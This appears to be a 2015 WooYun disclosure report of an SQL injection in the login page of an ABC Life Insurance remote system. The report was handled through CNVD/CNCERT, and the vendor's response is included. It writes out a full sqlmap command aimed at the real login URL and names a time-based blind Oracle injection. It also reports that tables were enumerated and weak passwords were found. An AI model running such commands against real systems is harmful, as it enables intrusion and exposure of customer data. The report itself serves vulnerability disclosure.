当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0119873

漏洞标题:农银人寿某站存在SQL注射漏洞

相关厂商:农银人寿

漏洞作者: 茜茜公主

提交时间:2015-06-12 13:05

修复时间:2015-07-31 11:32

公开时间:2015-07-31 11:32

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:15

漏洞状态:已交由第三方合作机构(cncert国家互联网应急中心)处理

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-06-12: 细节已通知厂商并且等待厂商处理中
2015-06-16: 厂商已经确认,细节仅向厂商公开
2015-06-26: 细节向核心白帽子及相关领域专家公开
2015-07-06: 细节向普通白帽子公开
2015-07-16: 细节向实习白帽子公开
2015-07-31: 细节向公众公开

简要描述:

sql注射

详细说明:

农银人寿保险股份有限公司(简称农银人寿)是由中国农业银行股份有限公司、北京中关村科学城建设股份有限公司等公司强强合作打造,并在国家工商行政管理总局注册的全国性人寿保险公司。公司总部位于北京,并在北京、浙江、辽宁、山东、福建、湖南、四川、江苏、陕西、河北、湖北、山西、河南、安徽、宁波、苏州、广东、上海、厦门和黑龙江设立了包括20家分公司在内的逾300家分支机构。

作为中国农业银行的控股子公司,农银人寿将依托中国农业银行雄厚的资金实力、庞大的经营网络、完善的金融服务和卓越的社会信誉,为客户提供高品质的保险保障和财富规划服务。
地址:http://remotebak.abchinalife.cn:7060/ui

QQ截图20150611095155.jpg


登录口存在注入

python SQLMap/SQLMap.py -u "http://remotebak.abchinalife.cn:7060/ui/logon/LogonSubmit.jsp" --data "UserCode=admin&PWD=admin&ComCode=001&AgentCom=001&AgentComName=123&ClientURL2=123&ClientURL=123&clientID=123&TYPEINSERT=123&txtMACAddr=123&txtIPAddr=123&txtDNSName=123&txtDiskValue=123&FormURL=.%2FInitUserSave.jsp&submit2.x=33&submit2.y=5" --dbms oracle --current-db


Parameter: UserCode (POST)
Type: AND/OR time-based blind
Title: Oracle AND time-based blind

漏洞证明:

QQ截图20150611210346.jpg


QQ截图20150611210429.jpg


QQ截图20150611210844.jpg


113张表

QQ截图20150611211027.jpg


随便看看数据

QQ截图20150611211504.jpg


大量的弱口令

QQ截图20150611211819.jpg

修复方案:

过滤

版权声明:转载请注明来源 茜茜公主@乌云


漏洞回应

厂商回应:

危害等级:中

漏洞Rank:9

确认时间:2015-06-16 11:31

厂商回复:

CNVD确认并复现所述情况,已经转由CNCERT向保险行业信息化主管部门通报,由其后续协调网站管理单位处置.

最新状态:

暂无


漏洞评价:

评论